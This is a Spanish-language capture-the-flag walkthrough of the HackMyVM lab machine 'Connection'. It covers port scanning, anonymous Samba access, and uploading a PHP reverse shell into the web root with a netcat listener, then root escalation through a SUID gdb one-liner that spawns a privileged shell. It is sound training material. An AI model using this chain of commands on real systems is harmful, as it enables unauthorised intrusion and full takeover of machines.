[HackMyVM] Connection

Hoy vamos a hackear la maquina de HackMyVM llamada Connection. Podeis registraros y descargarla desde el siguiente enlace: https://hackmyvm.eu
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- ✘ INT 7s Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 12:34 CEST Nmap scan report for Host is up (0.00061s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 b7:e6:01:b5:f9:06:a1:ea:40:04:29:44:f4:df:22:a1 (RSA) | 256 fb:16:94:df:93:89:c7:56:85:84:22:9e:a0:be:7c:95 (ECDSA) |_ 256 45:2e:fb:87:04:eb:d1:8b:92:6f:6a:ea:5a:a2:a1:1c (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Apache2 Debian Default Page: It works 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s |_nbstat: NetBIOS name: CONNECTION, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: connection | NetBIOS computer name: CONNECTION\x00 | Domain name: \x00 | FQDN: connection |_ System time: 2020-10-05T06:35:05-04:00 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-10-05 12:35:05 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds
    Vemos que tiene abiertos el puerto de SSH, Samba y HTTP. Echamos un vistazo a Samba.
    ~ > smbclient -L 17s mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado Unable to initialize messaging context Enter WORKGROUP\sml's password: Anonymous login successful Sharename Type Comment --------- ---- ------- share Disk print$ Disk Printer Drivers IPC$ IPC IPC Service (Private Share for uploading files) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP
    Hay una carpeta llamada "share", investigamos un poco mas....
    ~ > smbclient \\\\\\share mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado Unable to initialize messaging context Enter WORKGROUP\sml's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Sep 23 03:48:39 2020 .. D 0 Wed Sep 23 03:48:39 2020 html D 0 Wed Sep 23 04:20:00 2020 7158264 blocks of size 1024. 5463328 blocks available smb: \> cd html smb: \html\> dir . D 0 Wed Sep 23 04:20:00 2020 .. D 0 Wed Sep 23 03:48:39 2020 index.html N 10701 Wed Sep 23 03:48:45 2020 7158264 blocks of size 1024. 5463328 blocks available smb: \html\>
    Vemos que dentro de "share" hay una carpeta llamada "html" y dentro se encuentra index.html. Todo apunta a que es la carpeta a la que accede el servidor web, con lo cual vamos a subir una reverse shell al samba y ver si desde la web podemos ejecutarla :) Preparamos nuestra reverse shell.
    ~ > cp /usr/share/webshells/php/php-reverse-shell.php . ~ > mv php-reverse-shell.php rshell.php ~ > nano rshell.php #Configuramos IP-PUERTO.
    Subimos la reverse shell.
    smb: \html\> put rshell.php putting file rshell.php as \html\rshell.php (1788,7 kb/s) (average 1788,7 kb/s)
    Ponemos nc a la escucha!
    ~ > nc -nlvp 1234 listening on [any] 1234 ...
    Y visitamos
  • Low Shell
  • Obtenemos nuestra reverse shell :)
    ~ > nc -nlvp 1234 listening on [any] 1234 ... connect to [] from (UNKNOWN) [] 58858 Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux 06:37:23 up 4 min, 0 users, load average: 0.00, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    Una vez dentro, exploramos un poco el sistema y miramos los ficheros que tiene con SUID.
  • Privilege Escalation
  • www-data@connection:/$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/newgrp /usr/bin/umount /usr/bin/su /usr/bin/passwd /usr/bin/gdb /usr/bin/chsh /usr/bin/chfn /usr/bin/mount /usr/bin/gpasswd
    Vemos que el binario gdb esta en la lista, y dicho binario podemos usarlo para escalar privilegios!
    www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word". # id uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
  • root.txt
  • # cd /root # ls proof.txt # cut -c-5 proof.txt a7c6e
  • End
  • Y con esto ya seriamos root de la maquina.